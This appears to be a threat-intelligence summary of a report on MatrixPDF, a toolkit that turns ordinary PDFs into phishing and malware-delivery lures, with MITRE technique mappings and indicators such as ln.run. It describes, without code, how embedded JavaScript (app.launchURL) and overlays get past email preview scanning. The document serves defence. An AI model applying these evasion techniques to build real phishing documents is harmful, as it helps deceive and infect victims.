MatrixPDF is a toolkit that transforms legitimate PDF files into interactive phishing and malware delivery tools by adding overlays, clickable prompts, and embedded JavaScript that redirect victims to attacker-controlled payloads. The toolkit exploits email PDF preview behavior and PDF scripting (e.g., app.launchURL) to bypass scanning and initiate downloads, often using short or legitimate-looking domains like ln.run. #MatrixPDF #ln.run
Keypoints
- MatrixPDF is a builder that modifies genuine PDF documents with social-engineering elements (fake “Secure Document” prompts, custom icons, and content blur) to lure victims.
- The toolkit can embed JavaScript and clickable annotations to open external payload URLs or execute actions when the PDF is opened or clicked.
- Method 1 abuses email PDF preview (e.g., Gmail) by using clickable overlays that open external sites, bypassing in-email malware scanning because no binary payload is contained in the PDF.
- Method 2 inserts document-level JavaScript (e.g., app.launchURL or form actions) that triggers downloads when the PDF is opened in readers that allow script execution and the user consents.
- Attackers often host payloads behind innocuous-looking short domains (example: ln.run) or public hosting, making detection and user suspicion less likely.
- Successful delivery relies on social engineering (users clicking “Open Secure Document” or granting permission to connect), splitting detection between email scanning and browser or OS download controls.
- AI-driven email security can detect these attacks by analyzing PDF structure and behavior, extracting and sandboxing embedded URLs, and simulating actions to reveal redirects and script-driven payload retrieval.
MITRE Techniques
- [T1204] User Execution – MatrixPDF uses social-engineering overlays and prompts like “Open Secure Document” to trick users into clicking or allowing actions that lead to payload retrieval. Quote: ‘…an overlay prompts the user to “Open Secure Document.”‘
- [T1205] Traffic Signaling – Embedded clickable links/annotations in PDFs open external payload URLs in the victim’s browser, signaling to attacker-controlled sites after a user-initiated action. Quote: ‘…the button press simply opens an external site in the user’s browser.’
- [T1027] Obfuscated Files or Information – PDFs are modified with blurred content and overlays to conceal true intent and hide embedded scripts or links until user interaction. Quote: ‘…content blurring, and redirects. To the recipient, the file looks routine…’
- [T1105] Ingress Tool Transfer – The PDF initiates downloads from external URLs (e.g., putty.exe as a stand-in) to transfer malware to the victim’s system. Quote: ‘…the PDF’s embedded link points to a download for PuTTY…this download is a stand-in for a malware payload.’
- [T1203] Exploitation for Client Execution – Document-level JavaScript (e.g., app.launchURL or form submission actions) is used to execute actions when a PDF is opened, potentially triggering external connections and downloads. Quote: ‘…this might be implemented via an Acrobat JavaScript API call (e.g., app.launchURL()) that initiates a download.’
Indicators of Compromise
- [Domain] Hosted payload or redirect domains – ln.run (short URL used to fetch payload), and public hosting domains used to serve files like putty.exe.
- [File name] Malicious or masqueraded executables – putty.exe used as a stand-in for a malware payload (attacker-controlled executable).
- [Artifact] PDF behaviors and objects – blurred content overlays and “Open Secure Document” annotation/buttons observed in malicious PDFs (indicator of manipulated PDF structure).
- [Technique] Embedded JavaScript API calls in PDFs – references to app.launchURL or document-level scripts that fetch external content (observed in malicious PDF scripts).
Read more: https://www.varonis.com/blog/matrixpdf